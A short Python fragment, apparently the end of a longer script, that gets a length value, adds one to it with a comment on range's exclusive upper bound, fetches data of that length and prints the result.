length = get_length() + 1   #note the +1: range(1,10) covers 1 <= x < 10, so the upper bound is exclusive
get_data(length)
print(".....data is :"+ result)
 